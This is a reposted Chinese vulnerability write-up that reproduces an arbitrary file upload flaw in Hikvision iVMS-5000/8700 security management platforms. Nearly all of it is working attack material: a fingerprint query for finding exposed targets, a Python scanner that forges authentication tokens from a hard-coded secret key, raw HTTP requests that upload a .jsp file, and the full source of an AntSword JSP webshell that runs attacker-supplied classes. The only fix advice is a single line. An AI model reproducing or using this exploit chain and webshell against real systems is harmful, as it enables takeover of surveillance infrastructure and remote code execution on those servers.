海康威视iVMS综合安防系统任意文件上传漏洞复现

04.8W+0
华盟原创文章投稿奖励计划

0x01 产品简介

海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。

0x02 漏洞概述

海康威视iVMS系统存在在野 0day 漏洞攻击者通过获取密钥任意构造token,请求/resourceOperations/upload接口任意上传文件,导致获取服务器webshell权限,同时可远程进行恶意代码执行。

0x03 影响范围

海康威视综合安防系统iVMS-5000

海康威视综合安防系统 iVMS-8700

0x04 复现环境

鹰图指纹:web.body=”/views/home/file/installPackage.rar”

自动草稿

0x05 漏洞复现 

检测脚本PoC:https://github.com/sccmdaveli/hikvision-poc 

import requestsimport urllib3import urllibimport hashlibimport argparsefrom colorama import initfrom colorama import Foreinit(autoreset=True)urllib3.disable_warnings()  head = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36", "Cookie": "ISMS_8700_Sessionname=ABCB193BD9D82CC2D6094F6ED4D81169"}def md5encode(url): if url.endswith("/"): path = "eps/api/resourceOperations/uploadsecretKeyIbuilding" else: path = "/eps/api/resourceOperations/uploadsecretKeyIbuilding" encodetext = url + path input_name = hashlib.md5() input_name.update(encodetext.encode("utf-8")) return (input_name.hexdigest()).upper() def poc(url): if url.endswith("/"): path = "eps/api/resourceOperations/upload?token=" else: path = "/eps/api/resourceOperations/upload?token=" pocurl = url + path + md5encode(url) data = { "service": urllib.parse.quote(url + "/home/index.action") } try: response = requests.post(url=pocurl,headers=head,data=data,verify=False,timeout=3) if response.status_code==200: print(Fore.GREEN + f"[+]{url}存在海康威视iVMS 综合安防任意文件上传漏洞!!!!") else: print(Fore.RED + f"[-]{url}不存在海康威视iVMS 综合安防任意文件上传漏洞") except: pass if __name__ == '__main__': parser = argparse.ArgumentParser(usage='python3 ivms.py -u http://xxxx\npython3 ivms.py -f file.txt', description='ivms漏洞检测poc', ) p = parser.add_argument_group('ivms 的参数') p.add_argument("-u", "--url", type=str, help="测试单条url") p.add_argument("-f", "--file", type=str, help="测试多个url文件") args = parser.parse_args() if args.url: poc(args.url) if args.file: for i in open(args.file,"r").read().split("\n"): poc(i)

使用方式:

单个url检测: 

python3 ivms-poc.py -u url

多个url检测: 

python3 ivms-poc.py -f file.txt

效果:

自动草稿

手动复现 

漏洞url:/eps/api/resourceOperations/upload

bp抓取首页包,尝试访问接口(发现token需要进行鉴权)

自动草稿 

POST /eps/api/resourceOperations/upload HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://you-ipConnection: closeCookie: ISMS_8700_Sessionname=7634604FBE659A8532E666FE4AA41BE9Upgrade-Insecure-Requests: 1Content-Length: 62 service=http%3A%2F%2Fx.x.x.x%3Ax%2Fhome%2Findex.action

构造token绕过认证  (内部机制:如果token值与请求url+secretkey的md5值相同就可以绕过认证)

secretkey是代码里写死的(默认值:secretKeyIbuilding)

token值需要进行MD5加密(32位大写)

组合:token=MD5(url+”secretKeyIbuilding”)

自动草稿

重新验证

自动草稿

可以看到,成功绕过

构造文件上传payload 

POST /eps/api/resourceOperations/upload?token=构造的token值 HTTP/1.1Host: your-ipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeCookie: ISMS_8700_Sessionname=A29E70BEA1FDA82E2CF0805C3A389988Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryGEJwiloiPoUpgrade-Insecure-Requests: 1Content-Length: 174 ------WebKitFormBoundaryGEJwiloiPoContent-Disposition: form-data; name="fileUploader";filename="1.jsp"Content-Type: image/jpeg test------WebKitFormBoundaryGEJwiloiPo

自动草稿

显示上传成功且返回了resourceUuid值

验证路径:http://url/eps/upload/resourceUuid的值.jsp

自动草稿

0x06 漏洞利用

直接上传蚁剑jsp马子 

<%! class U extends ClassLoader { U(ClassLoader c) { super(c); } public Class g(byte[] b) { return super.defineClass(b, 0, b.length); } }  public byte[] base64Decode(String str) throws Exception { try { Class clazz = Class.forName("sun.misc.BASE64Decoder"); return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); } catch (Exception e) { Class clazz = Class.forName("java.util.Base64"); Object decoder = clazz.getMethod("getDecoder").invoke(null); return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); } }%><% String cls = request.getParameter("passwd"); if (cls != null) { new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(pageContext); }%>

自动草稿

上传成功,尝试连接

自动草稿

0x07 修复建议

关闭互联网暴露面访问的权限,文件上传模块做好权限强认证。

原文链接:https://blog.csdn.net/qq_41904294/article/details/130807691

原文作者:OidBoy_G

黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!

如侵权请私聊我们删文


END

© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
渗透测试
喜欢就支持一下吧
点赞0 分享
guaigou的头像-华盟网
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!-华盟网
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!
HW在即,今日分享|常用的渗透测试工具及相关资料整理,查收!
2年前 29.1W+
重磅|华盟HW工程师招募-华盟网
重磅|华盟HW工程师招募
重磅|华盟HW工程师招募
4年前 27.4W+
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”-华盟网
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”
最难就业季|“本想先读书躲一躲,谁料行情还不如两年前”
4年前 25.8W+
挖矿病毒“盯上”了 Docker 服务器-华盟网
挖矿病毒“盯上”了 Docker 服务器
挖矿病毒“盯上”了 Docker 服务器
4年前 24.1W+
让所有反病毒引擎都无法检测到的恶意软件出现了!-华盟网
让所有反病毒引擎都无法检测到的恶意软件出现了!
让所有反病毒引擎都无法检测到的恶意软件出现了!
4年前 23.8W+
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗-华盟网
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗
功能太强大!网络犯罪论坛新成员Prynt Stealer无所不盗
4年前 23.1W+
相关推荐
一个免杀钓鱼思路分享-华盟网
一个免杀钓鱼思路分享
一个免杀钓鱼思路分享
6年前 22.6W+
实战 | 记一次较为详细的代码审计过程-华盟网
实战 | 记一次较为详细的代码审计过程
实战 | 记一次较为详细的代码审计过程
4年前 17.1W+
实战 | 记一次较为详细的代码审计过程-华盟网
实战 | 记一次较为详细的代码审计过程
实战 | 记一次较为详细的代码审计过程
4年前 15.9W+
【渗透测试】看怎么搞定黄网!-华盟网
【渗透测试】看怎么搞定黄网!
【渗透测试】看怎么搞定黄网!
10年前 15.9W+
使用LUKS加密分区-华盟网
使用LUKS加密分区
使用LUKS加密分区
8年前 15.5W+
解码内置不安全“加密芯片”的勒索软件Gomasom-华盟网
解码内置不安全“加密芯片”的勒索软件Gomasom
解码内置不安全“加密芯片”的勒索软件Gomasom
9年前 15.1W+
评论 抢沙发

请登录后发表评论

    暂无评论内容